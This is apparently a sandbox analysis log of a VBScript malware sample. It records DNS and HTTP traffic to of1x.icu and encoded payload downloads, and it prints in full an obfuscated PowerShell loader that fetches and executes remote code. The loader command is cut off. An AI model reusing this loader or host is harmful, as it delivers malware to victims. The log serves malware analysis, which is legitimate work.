Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 07:52:13.939084053 CET | 192.168.2.6 | 1.1.1.1 | 0x7596 | Standard query (0) | of1x.icu | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 07:52:05.396501064 CET | 1.1.1.1 | 192.168.2.6 | 0x83af | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 07:52:05.396501064 CET | 1.1.1.1 | 192.168.2.6 | 0x83af | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:52:14.250530005 CET | 1.1.1.1 | 192.168.2.6 | 0x7596 | No error (0) | of1x.icu | | 104.21.86.72 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:52:14.250530005 CET | 1.1.1.1 | 192.168.2.6 | 0x7596 | No error (0) | of1x.icu | | 172.67.216.143 | A (IP address) | IN (0x0001) | false

• of1x.icu
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49731 | 104.21.86.72 | 443 | 3664 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 06:52:15 UTC | 173 | OUT | GET /pnTClIjB/Shotstar.psd HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: of1x.icu
Connection: Keep-Alive
2024-12-19 06:52:16 UTC | 785 | IN | HTTP/1.1 200 OK
Date: Thu, 19 Dec 2024 06:52:15 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uQnF2lnF7I1jBmcjba4zqRv15SbPl7Sp5s1vUs8e4TIeA3j%2FCgzG%2Fivny42WX%2FRPT%2F6zCGwa6ackwUa726yNoSK%2BDHFYnxCkbngwTleOooHwUyIk9sjdlYh0bg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f4578067f61efa9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1987&rtt_var=762&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=787&delivery_rate=1420924&cwnd=140&unsent_bytes=0&cid=aa003bd2dd51f149&ts=601&x=0"
2024-12-19 06:52:16 UTC | 1369 | IN | Data Raw: 33 31 65 61 0d 0a 63 51 47 62 63 51 47 62 75 39 4f 76 45 77 44 72 41 6f 78 37 63 51 47 62 41 31 77 6b 42 48 45 42 6d 33 45 42 6d 37 6e 63 38 6a 44 78 36 77 4b 4b 32 48 45 42 6d 34 48 70 77 6c 55 37 36 6e 45 42 6d 2b 73 43 38 4a 79 42 36 52 71 64 39 51 5a 78 41 5a 76 72 41 68 47 68 63 51 47 62 63 51 47 62 75 70 7a 56 72 61 4c 72 41 69 51 4d 63 51 47 62 36 77 4b 67 58 75 73 43 4e 38 55 78 79 75 73 43 78 6e 39 78 41 5a 75 4a 46 41 74 78 41 5a 76 72 41 6c 58 5a 30 65 4a 78 41 5a 74 78 41 5a 75 44 77 51 52 78 41 5a 76 72 41 67 65 55 67 66 6e 74 59 69 55 46 66 4d 76 72 41 74 46 39 36 77 4c 2f 4b 6f 74 45 4a 41 54 72 41 72 36 73 63 51 47 62 69 63 50 72 41 69 72 4b 36 77 4a 4e 49 34 48 44 64 46 75 70 41 33 45 42 6d 2b 73 43 6c 4e 75 36 4b 78 65 4d 30 4f 73 43 6c
Data Ascii: 31eacQGbcQGbu9OvEwDrAox7cQGbA1wkBHEBm3EBm7nc8jDx6wKK2HEBm4HpwlU76nEBm+sC8JyB6Rqd9QZxAZvrAhGhcQGbcQGbupzVraLrAiQMcQGb6wKgXusCN8UxyusCxn9xAZuJFAtxAZvrAlXZ0eJxAZtxAZuDwQRxAZvrAgeUgfntYiUFfMvrAtF96wL/KotEJATrAr6scQGbicPrAirK6wJNI4HDdFupA3EBm+sClNu6KxeM0OsCl
2024-12-19 06:52:16 UTC | 1369 | IN | Data Raw: 45 36 67 48 6f 41 64 54 47 76 75 69 53 54 65 77 42 47 75 32 77 68 64 57 49 5a 62 67 6a 41 65 69 49 34 31 42 6a 6a 4a 73 41 36 41 46 45 4f 44 6c 72 49 2f 35 64 79 53 49 42 36 49 48 62 43 51 41 61 61 67 58 6f 67 64 6c 50 61 58 78 53 33 48 63 42 49 67 35 6e 62 47 73 46 36 49 69 6e 4d 65 6b 42 49 6d 63 66 78 74 42 36 4c 30 55 47 43 5a 6e 58 4b 6f 6c 70 52 51 59 4a 57 4d 54 68 44 57 6c 31 42 67 6d 70 71 4c 76 41 61 55 55 47 43 55 6a 4c 69 4b 75 4f 68 4f 46 6e 30 63 4c 52 44 69 38 32 49 67 48 6f 41 53 49 42 36 41 45 32 54 62 72 78 4d 65 4c 30 62 4e 78 65 72 62 31 76 58 64 69 53 35 6c 44 51 36 50 2f 6b 5a 38 69 44 53 53 42 34 6b 2f 70 2b 61 5a 55 61 2f 31 4c 4b 32 76 55 46 49 6f 69 31 47 65 37 4c 47 52 32 71 65 6d 53 6b 45 50 56 4d 4f 78 50 75 59 30 77 36 75 77
Data Ascii: E6gHoAdTGvuiSTewBGu2whdWIZbgjAeiI41BjjJsA6AFEODlrI/5dySIB6IHbCQAaagXogdlPaXxS3HcBIg5nbGsF6IinMekBImcfxtB6L0UGCZnXKolpRQYJWMThDWl1BgmpqLvAaUUGCUjLiKuOhOFn0cLRDi82IgHoASIB6AE2TbrxMeL0bNxerb1vXdiS5lDQ6P/kZ8iDSSB4k/p+aZUa/1LK2vUFIoi1Ge7LGR2qemSkEPVMOxPuY0w6uw
2024-12-19 06:52:16 UTC | 1369 | IN | Data Raw: 47 5a 6a 36 4e 36 61 49 45 33 55 65 43 38 4a 71 45 39 34 52 61 74 77 4e 59 2f 7a 4d 6d 32 48 61 7a 5a 64 68 77 67 55 51 63 33 2b 58 58 49 50 2f 50 33 6c 79 4b 72 32 51 4e 6d 49 5a 65 64 38 6d 49 50 6c 6e 36 54 46 56 66 49 2b 78 69 4b 63 68 36 51 45 69 7a 5a 71 45 66 47 42 61 7a 59 56 51 54 6f 35 53 44 37 4c 74 65 6f 42 68 75 4e 69 4b 32 32 72 2b 4a 35 33 4d 4f 50 62 57 51 30 74 70 45 39 78 6c 4f 46 38 67 31 64 4c 74 4c 4d 7a 69 2f 77 63 57 37 72 6d 34 48 50 67 76 50 61 50 77 36 31 45 48 61 32 6e 77 48 36 6b 4b 56 33 47 64 59 65 49 6a 43 6e 55 35 38 58 54 74 38 37 62 4a 5a 55 76 79 30 6a 4a 6e 35 69 79 75 73 6b 6e 4b 59 34 42 66 64 53 39 52 49 67 48 6e 6a 45 61 2b 36 41 46 35 5a 78 2f 41 70 61 75 78 69 4b 66 47 36 51 45 69 44 75 6b 53 46 51 48 6f 41 53 49
Data Ascii: GZj6N6aIE3UeC8JqE94RatwNY/zMm2HazZdhwgUQc3+XXIP/P3lyKr2QNmIZed8mIPln6TFVfI+xiKch6QEizZqEfGBazYVQTo5SD7LteoBhuNiK22r+J53MOPbWQ0tpE9xlOF8g1dLtLMzi/wcW7rm4HPgvPaPw61EHa2nwH6kKV3GdYeIjCnU58XTt87bJZUvy0jJn5iyusknKY4BfdS9RIgHnjEa+6AF5Zx/ApauxiKfG6QEiDukSFQHoASI
2024-12-19 06:52:16 UTC | 1369 | IN | Data Raw: 49 71 49 46 73 31 73 67 4e 2f 4c 6d 43 64 69 70 76 79 7a 68 63 31 65 76 37 34 4e 45 63 71 6e 6f 2f 62 74 33 37 75 59 61 66 62 4c 51 43 78 6c 6f 38 5a 6d 55 4b 4f 6c 59 51 59 61 6e 39 54 2b 6a 55 53 4e 46 2f 4f 49 34 33 30 74 67 69 57 42 43 4d 4a 30 35 65 59 72 61 62 6e 51 6f 63 56 69 65 64 63 52 2f 59 79 52 5a 75 38 4e 31 70 39 37 57 7a 75 4f 58 62 34 72 30 34 38 6c 62 62 64 54 6d 43 74 56 55 54 69 41 47 6f 39 62 4d 63 47 41 30 4d 4d 41 48 6e 79 41 4b 70 76 32 67 58 70 51 76 6f 67 4a 43 44 4f 63 6a 6f 54 59 63 2b 65 74 78 55 6f 54 34 32 36 30 46 64 34 38 4b 77 64 6e 6a 75 6d 42 34 6a 55 6e 30 4f 39 37 56 31 5a 67 61 6b 65 75 67 74 78 76 35 34 32 41 50 75 77 42 66 46 75 41 6f 48 49 66 2f 47 6d 37 6b 57 75 49 6f 7a 58 4d 75 72 6e 41 61 34 41 6d 4a 61 70 79
Data Ascii: IqIFs1sgN/LmCdipvyzhc1ev74NEcqno/bt37uYafbLQCxlo8ZmUKOlYQYan9T+jUSNF/OI430tgiWBCMJ05eYrabnQocViedcR/YyRZu8N1p97WzuOXb4r048lbbdTmCtVUTiAGo9bMcGA0MMAHnyAKpv2gXpQvogJCDOcjoTYc+etxUoT4260Fd48KwdnjumB4jUn0O97V1Zgakeugtxv542APuwBfFuAoHIf/Gm7kWuIozXMurnAa4AmJapy
2024-12-19 06:52:16 UTC | 1369 | IN | Data Raw: 6b 50 7a 51 6e 42 72 64 75 73 6b 76 45 53 44 32 55 4c 4d 44 53 41 46 69 58 6c 38 34 59 66 4a 4b 33 47 39 39 56 41 6f 76 42 4c 67 72 68 45 38 2b 4c 38 50 4f 63 73 48 36 56 79 70 57 75 72 64 39 47 67 77 6f 48 63 75 4c 34 73 48 36 39 41 67 46 35 49 6b 55 6d 49 6e 33 44 71 41 53 49 4f 36 54 49 4a 41 65 67 42 49 67 48 6f 41 53 49 6a 4f 47 7a 73 2b 78 71 59 58 54 4b 4c 50 77 41 4d 78 38 2f 41 6b 46 65 53 61 45 4e 31 67 4e 55 59 57 4c 77 55 67 42 2f 6b 36 70 77 6f 67 4e 56 37 32 6d 4e 4a 55 31 4b 37 41 54 67 79 67 4f 44 69 36 67 68 70 67 42 6f 70 6e 62 68 31 67 4e 43 30 63 50 71 61 56 33 53 49 78 41 6a 2b 6e 45 53 45 47 6e 49 37 4e 6b 45 79 6b 79 69 4b 5a 62 2f 71 43 51 79 31 4c 6c 78 6a 49 39 4f 66 61 5a 51 41 57 7a 52 41 52 43 38 6f 36 34 6e 37 72 33 52 6c 2f
Data Ascii: kPzQnBrduskvESD2ULMDSAFiXl84YfJK3G99VAovBLgrhE8+L8POcsH6VypWurd9GgwoHcuL4sH69AgF5IkUmIn3DqASIO6TIJAegBIgHoASIjOGzs+xqYXTKLPwAMx8/AkFeSaEN1gNUYWLwUgB/k6pwogNV72mNJU1K7ATgygODi6ghpgBopnbh1gNC0cPqaV3SIxAj+nESEGnI7NkEykyiKZb/qCQy1LlxjI9OfaZQAWzRARC8o64n7r3Rl/
2024-12-19 06:52:16 UTC | 1369 | IN | Data Raw: 70 77 75 72 32 4f 51 71 6a 36 74 4f 49 5a 68 70 68 41 67 56 49 67 77 43 37 52 65 42 34 74 42 48 31 71 64 49 6e 71 2b 50 6b 69 79 7a 45 56 45 69 4d 77 6c 4d 5a 38 61 42 63 30 4f 53 51 65 59 42 46 6b 43 4d 42 36 42 62 4b 58 41 36 41 6c 35 44 70 41 53 49 76 45 66 47 30 67 47 32 51 49 77 48 6f 67 44 74 62 68 56 4f 59 56 77 2f 71 70 59 41 43 55 77 69 79 5a 59 44 67 64 4f 32 79 31 6f 41 61 59 72 6c 4d 6d 34 44 51 47 37 43 6e 76 31 5a 30 69 4d 55 41 2f 35 79 6d 30 5a 67 62 34 76 6f 41 45 45 65 46 6a 72 4f 53 6f 73 72 2b 4a 6d 39 41 48 2b 38 4d 63 45 75 2f 6b 34 77 6a 6c 46 70 46 68 65 74 65 62 63 6c 34 55 6c 50 63 66 4c 71 4c 67 4e 47 46 74 32 52 79 67 42 73 6b 44 6b 75 77 67 4f 45 54 59 32 32 32 69 4f 76 45 75 37 74 5a 45 36 59 44 69 42 79 39 46 79 33 45 4d 78
Data Ascii: pwur2OQqj6tOIZhphAgVIgwC7ReB4tBH1qdInq+PkiyzEVEiMwlMZ8aBc0OSQeYBFkCMB6BbKXA6Al5DpASIvEfG0gG2QIwHogDtbhVOYVw/qpYACUwiyZYDgdO2y1oAaYrlMm4DQG7Cnv1Z0iMUA/5ym0Zgb4voAEEeFjrOSosr+Jm9AH+8McEu/k4wjlFpFhetebcl4UlPcfLqLgNGFt2RygBskDkuwgOETY222iOvEu7tZE6YDiBy9Fy3EMx
2024-12-19 06:52:16 UTC | 1369 | IN | Data Raw: 6b 4f 32 6d 54 58 37 4d 4c 41 4c 46 56 4c 52 78 6e 57 48 69 4b 77 4a 31 68 50 4e 77 38 59 4c 4a 37 2f 4a 64 35 35 66 48 56 4d 41 69 38 55 48 35 47 35 67 63 38 79 77 71 2b 63 52 42 53 56 4c 67 68 43 68 61 70 74 4f 77 7a 64 38 44 66 56 4d 49 63 59 64 69 6e 71 4a 6c 4b 6e 77 6c 38 54 70 42 4d 6b 6d 49 76 2b 72 70 41 53 4b 36 6d 55 56 67 72 37 69 35 46 68 41 35 48 69 64 79 6a 37 58 67 4e 48 50 42 58 6e 62 64 73 71 64 6c 67 7a 54 46 72 48 58 2f 71 78 47 2b 65 68 36 49 2f 49 41 71 4f 63 66 41 4f 74 4f 6b 53 79 2b 61 2b 61 48 31 31 33 4d 57 30 73 4f 4e 62 66 56 46 4b 79 53 74 61 52 70 49 75 57 57 4f 57 61 50 79 35 30 6d 6e 33 43 54 36 6e 69 46 4c 57 69 37 34 4f 64 52 68 4e 38 62 67 6d 4d 70 36 67 4e 47 5a 4d 66 41 2f 44 75 6a 61 75 77 48 6f 41 53 49 42 36 41 45
Data Ascii: kO2mTX7MLALFVLRxnWHiKwJ1hPNw8YLJ7/Jd55fHVMAi8UH5G5gc8ywq+cRBSVLghChaptOwzd8DfVMIcYdinqJlKnwl8TpBMkmIv+rpASK6mUVgr7i5FhA5Hidyj7XgNHPBXnbdsqdlgzTFrHX/qxG+eh6I/IAqOcfAOtOkSy+a+aH113MW0sONbfVFKyStaRpIuWWOWaPy50mn3CT6niFLWi74OdRhN8bgmMp6gNGZMfA/DujauwHoASIB6AE
2024-12-19 06:52:16 UTC | 1369 | IN | Data Raw: 51 62 69 78 36 52 4d 67 4f 77 6c 7a 4a 2f 78 31 65 37 55 48 2b 52 7a 50 38 4b 35 4a 78 76 4b 6e 7a 56 2b 75 64 44 32 4f 43 78 64 62 51 41 71 4f 62 78 67 51 49 33 70 78 57 39 61 53 6b 52 37 54 77 2f 4d 48 79 6a 75 39 32 75 79 71 56 45 7a 57 37 71 43 33 73 59 4d 46 67 70 62 37 34 68 64 72 43 4d 42 36 4c 39 67 6d 59 2b 76 6f 2f 66 75 4a 6d 64 2b 4a 4d 66 2b 43 6f 30 78 4e 78 41 56 79 35 6c 65 77 74 75 6f 54 51 7a 52 73 6b 7a 68 67 4e 53 38 39 48 53 50 67 43 34 69 66 71 6c 72 55 70 6d 39 44 49 66 41 67 43 76 66 4e 48 41 5a 67 4d 6d 62 45 76 62 78 56 6e 53 49 78 51 44 33 6e 45 51 34 4b 48 73 30 70 33 4d 71 34 47 4a 41 72 67 51 53 44 42 67 39 56 78 5a 67 37 44 72 35 50 6f 67 54 31 77 75 31 35 7a 59 42 6a 38 70 56 30 38 6c 34 6a 59 56 47 4f 51 5a 65 70 73 6d 7a
Data Ascii: Qbix6RMgOwlzJ/x1e7UH+RzP8K5JxvKnzV+udD2OCxdbQAqObxgQI3pxW9aSkR7Tw/MHyju92uyqVEzW7qC3sYMFgpb74hdrCMB6L9gmY+vo/fuJmd+JMf+Co0xNxAVy5lewtuoTQzRskzhgNS89HSPgC4ifqlrUpm9DIfAgCvfNHAZgMmbEvbxVnSIxQD3nEQ4KHs0p3Mq4GJArgQSDBg9VxZg7Dr5PogT1wu15zYBj8pV08l4jYVGOQZepsmz
2024-12-19 06:52:16 UTC | 1369 | IN | Data Raw: 4c 74 5a 34 41 5a 68 46 49 33 52 49 44 54 65 41 50 38 69 6f 41 5a 32 42 62 42 45 56 47 2b 69 41 67 41 4b 70 7a 51 77 31 30 6b 6f 2f 56 4a 54 65 35 63 68 63 57 7a 6b 6a 43 53 47 73 73 4c 72 62 49 50 6f 78 6f 59 75 72 66 6a 38 75 54 61 67 33 51 7a 52 52 77 30 51 34 6e 63 49 35 6c 52 4d 6b 67 72 51 6d 66 52 32 48 6f 34 4f 56 6a 75 57 58 61 36 70 75 51 56 50 31 58 78 41 46 73 4a 73 6a 4d 63 45 79 4d 49 48 47 4b 41 30 41 4f 4a 62 4a 4e 30 77 59 47 51 42 5a 70 30 4e 63 30 68 76 38 39 71 34 69 33 4c 6c 6e 55 2f 38 43 33 6e 4c 53 53 76 45 76 30 6b 6a 4e 77 48 79 7a 41 78 6b 77 79 77 4a 4c 7a 4f 39 43 70 6e 39 6f 43 38 6c 41 47 4f 47 2b 41 47 67 56 6f 49 4b 33 53 4a 7a 53 58 78 77 75 61 42 2f 6b 4b 38 46 42 4b 31 4c 46 4a 53 6c 78 38 57 69 72 38 70 36 51 45 69 7a
Data Ascii: LtZ4AZhFI3RIDTeAP8ioAZ2BbBEVG+iAgAKpzQw10ko/VJTe5chcWzkjCSGssLrbIPoxoYurfj8uTag3QzRRw0Q4ncI5lRMkgrQmfR2Ho4OVjuWXa6puQVP1XxAFsJsjMcEyMIHGKA0AOJbJN0wYGQBZp0Nc0hv89q4i3LlnU/8C3nLSSvEv0kjNwHyzAxkwywJLzO9Cpn9oC8lAGOG+AGgVoIK3SJzSXxwuaB/kK8FBK1LFJSlx8Wir8p6QEiz
2024-12-19 06:52:16 UTC | 465 | IN | Data Raw: 4e 73 51 65 32 58 73 66 39 68 79 70 71 67 67 34 61 45 77 52 58 4d 35 50 58 66 50 34 4c 70 56 58 59 6b 36 37 5a 61 56 4e 64 6f 6e 54 33 49 6f 31 53 59 35 79 4d 41 4f 67 42 53 69 7a 53 7a 70 53 41 37 43 55 58 4d 31 68 66 6f 7a 58 4d 30 68 50 31 47 77 37 6c 4d 53 67 42 49 67 48 6f 41 53 49 42 36 42 68 6f 2b 30 47 44 61 41 77 4a 30 39 4b 30 56 6c 51 53 50 4a 75 58 5a 63 36 4a 50 6d 5a 44 6e 2b 39 61 67 4d 51 6c 6b 31 78 6a 35 2b 35 45 53 47 32 45 74 53 69 35 64 5a 36 2f 44 6a 2b 69 74 55 6e 54 76 74 67 63 66 30 45 58 7a 58 72 39 30 6f 6b 59 49 6d 68 47 46 4f 4b 41 45 4c 6f 67 41 6f 41 57 4a 65 4a 73 67 35 55 6b 70 5a 4e 45 72 47 59 4f 4f 33 4d 78 45 36 33 77 43 7a 63 56 79 61 75 30 49 4f 54 69 70 6e 54 46 2f 51 52 6f 47 51 7a 7a 32 5a 78 55 32 35 47 72 38 57
Data Ascii: NsQe2Xsf9hypqgg4aEwRXM5PXfP4LpVXYk67ZaVNdonT3Io1SY5yMAOgBSizSzpSA7CUXM1hfozXM0hP1Gw7lMSgBIgHoASIB6Bho+0GDaAwJ09K0VlQSPJuXZc6JPmZDn+9agMQlk1xj5+5ESG2EtSi5dZ6/Dj+itUnTvtgcf0EXzXr90okYImhGFOKAELogAoAWJeJsg5UkpZNErGYOO3MxE63wCzcVyau0IOTipnTF/QRoGQzz2ZxU25Gr8W


Session ID: 1
Source IP: 192.168.2.6
Source Port: 49820
Destination IP: 104.21.86.72
Destination Port: 443
PID: 4000
Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2024-12-19 06:52:55 UTC
Bytes transferred: 188
Direction: OUT
Data:
GET /SPJvBNUT/VgfkXiQUJNREEqCxjfN242.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: of1x.icu
Cache-Control: no-cache

Timestamp: 2024-12-19 06:52:55 UTC
Bytes transferred: 862
Direction: IN
Data:
HTTP/1.1 200 OK
Date: Thu, 19 Dec 2024 06:52:55 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Last-Modified: Thu, 19 Dec 2024 06:52:55 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GXsOy0%2BNnReWggCOZq1jkp10z%2FUYa%2BvTPYBw15yyTTR2t9QcBPRpXU122a7A0ygkCZCoEGWNGYqyfd%2BVbJmaW82vwT3wqYutfj%2F8Yqtga0Fu%2Bl4pX%2FokHsrOSg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f4578fdca4f8ce0-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1985&rtt_var=748&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=826&delivery_rate=1458541&cwnd=206&unsent_bytes=0&cid=8bf286dd2bc72a27&ts=680&x=0"


Target ID: 0
Start time: 01:52:09
Start date: 19/12/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs"
Imagebase: 0x7ff782170000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 01:52:10
Start date: 19/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA 
leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerFedt.AndeDKardoReimwMichnIndslCharoUdb,a M.cdPreoFStudiHeddlUforeHur,(kor $Ta ssIndotTa oa tratHa rsPrinrModeeGstetForitPsykeExu n ack,Virg$TilfD Tn r Comiu.esvOssih.orduIn usoverpSelvlSkygaJylln un.tHus eOvernBog sCata)';$Drivhusplantens=$Bndslets;Woodranger (Relationsdatabasemodellen 'Chic$VerdG RevlBes,o S.sbOpfyaArbelkva,: CypSHidfePolycLseseP,irR ProNRdoveLaboNPerstBear=St.n( GriTWhaueDentSCallTAb s-EksppChelAHormtFog.h Reo Poly$FragDGarrR A rIHoloVLd.gHTranUTil,SProvpRefolCoaba bliNBeacTPatueBrecnIndaSUdsk)');while (!$Secernent) {Woodranger (Relationsdatabasemodellen 'Osvp$F nag WarlAfhooMuskb,leoaOystlJomf:GardGKo.teDagoaf derD emkKleraSj ps Ek sMoraeEnnes Er =Soli$Mortr.fske M,naRailtSmretBracrPhaniS ydbKugluSelst DeliT,kso Fu n') ;Woodranger $Cricotus;Woodranger (Relationsdatabasemodellen ' AriS CictT rkaAp,lRUdbeT Aan-PapeSTommlArite ntE H rPAn h Dep4');Woodranger (Relationsdatabasemodellen 'Se,e$Ag ngfakeLvindOC llb KimADeflL avo:PedaSblodETmmeCDisteEminR sdmN 
None ManNKa,rTSell= Az (SilkTIroneBaggS ritSuff-HorrPKatoaP,detRougHdr l Niv $AnaldUsafrVandiMa aVMin HTindUPre SIndkp,aprlA,uaA C nnPosttAla.eTubeNBasesUdsp)') ;Woodranger (Relationsdatabasemodellen 'cris$Re iGDiceLA.heOGirabOpsaarec LHvir:NondvSureiAd,oCVampTChaiI LanmEm liAntis fskI LacNKareGSche= er$CinegDespLSuspo ,aiB.pkkaBr.dlTi l:RustoJoosP.pans arntPrinOOptadPate+univ+Spio%Poly$MeanM upYThoraT lelIndbgIndiiPeruCPoor.HorrcAnnao ,ebuS rmnMel T') ;$statsretten=$Myalgic[$Victimising]}$Toxihemia=285000;$Houbara186=31460;Woodranger (Relationsdatabasemodellen ' Fej$CompgAfsvlLoggOAdytBSognaAntilR tc:Ps kIH ptn OveqProdUSoveiH kkeBolitIn,uUBi idiso ETek s Bol C.an=Koeo VladgB.trEWol.tEnv.- Va.c fo oOmstNSubstlsblER doNled.TSemi Coa$KoffDFyrrrGeneiE aiVAbsohSlaruEng SCrowPG rglI noASkr nIsolT AftePinsnRen s');Woodranger (Relationsdatabasemodellen 'hern$ C.ig G,nlPhagoEmanbBesta EkslS in:FordPPelauS rgiUninsNondtDkstiBacke But U de=g.ep Daa[MoniSO ery Ma s intC raeSt.mmIsle.tintCMitioCocknMirav Oble sacr Bekt Una]Angr:lay,:FiliFudkarSpilo,kabm amaB KutaRolfsFa te Le 6Hede4,xceS AtmtDialr GeniSphinTotagEnes(S et$FuldIPalenNrreq KanuOr,giDemee BabtC,cauXuhadChtheStansHerb)');Woodranger (Relationsdatabasemodellen 'Cust$GottgUna LSkiloDhy,B ChiaBaarlPale:GeneAChevpNondrUn eaBotoxNonmI,ekoa Rst2Apat2 Unl6Aud. Eent=Hy.r hom[ Fo StabuyBandsChipT SpaeRessm ,ss. AffT SubETe sXfrigtThog. .ubeKostnSpirC BeaoBa kDLivaiBiv n CocGMaha]expe: ,ip:Ad,eApasss.ygecHypoiSiphIBi t.NotegTraneSanst,gnosPerstAfisrStaniDryonOscugEdd (Kosm$ Ud,pHotluSejriGigasAndot unsI,umbeforb)');Woodranger (Relationsdatabasemodellen ' win$Gr sG ublS akOOp.aBunbeA.lanlPatu: U vmAandeE,sitWiseaEfteLLusto.onsPRoa.hAn u=Afhs$ TaraPot,PTalerAutoaudviXCen.i SkoARepr2Glyp2Arki6Klas.Ni esdukau PoobPurpsIntetSilkr SquI FjeNVellgsesa(Sol $EksptBilloBreeXS,seiA alh Gase Gl 